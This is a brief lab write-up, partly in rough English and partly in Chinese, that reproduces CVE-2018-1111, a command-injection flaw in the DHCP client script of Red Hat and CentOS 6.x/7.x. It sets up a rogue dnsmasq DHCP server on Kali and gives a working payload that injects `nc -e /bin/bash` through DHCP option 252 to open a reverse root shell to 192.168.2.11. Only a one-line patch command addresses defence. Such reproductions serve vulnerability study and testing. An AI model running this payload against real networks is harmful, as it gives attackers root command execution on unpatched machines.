DHCP command _CVE-2018-1111 vulnerability reproducibility
First, Vulnerability Description
NetworkManager integration script found in Red Hat Enterprise Linux multiple versions of the DHCP client packages included in the command injection vulnerability, an attacker can rogue DHCP server on the local network or using a false malicious DHCP responses to exploit this vulnerability attack, once the attack is successful, you can configure the DHCP on the NetworkManager system to execute arbitrary commands with root privileges.
Second, the flaw affects versions
Red hat 6.x、7.x
Centos 6.x、7.x
Third, the vulnerability reproducible environment to build
Test environment: Attack: kali target (target drones): centos7
- Configure the virtual network, set up only the host mode, turn off dhcp
- The attack aircraft and drones network host mode configured only
3.kali (attack aircraft) to build a dhcp service
3.1 Network first set (ip and gateway configuration) at kali
3.2 dnsmasq.conf a new file in the current directory, write to configure the following:
bind-interfaces
interface=eth0
except-interface=lo
dhcp-range=192.168.2.20,192.168.2.30,12h #dhcp-range:表示要分配给客户机的ip地址范围和租约时间
dhcp-option=3,192.168.2.11 #dhcp-option 表示指定给DHCP客户端的选项信息,3:表示设置网关地址选项
dhcp-option=6,192.168.2.11 #6:表示设置DNS服务器地址选项
log-queries
log-facility=/var/log/dnsmasq.log #表示日志记录器
4.漏洞利用payload
dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.2.11 8888 #"
252:表示为DHCP客户端提供了一个用于配置其代理设置的url, wpad-proxy-url
payload 中涉及到的 option 252 是私人使用保留部分的一部分, 为 dhcp 服务器使用 252,然后在他们的浏览器中写入与 dhcp 服务器交谈的能力,并要求代码 252 从该选项列出的 URL 中获取关于网络上代理设置的信息
5.kali开启监听
6.centos(靶机)重启网络服务,kali接收到反弹shell
四、漏洞防御
更新dhcp
yum -y update dhclient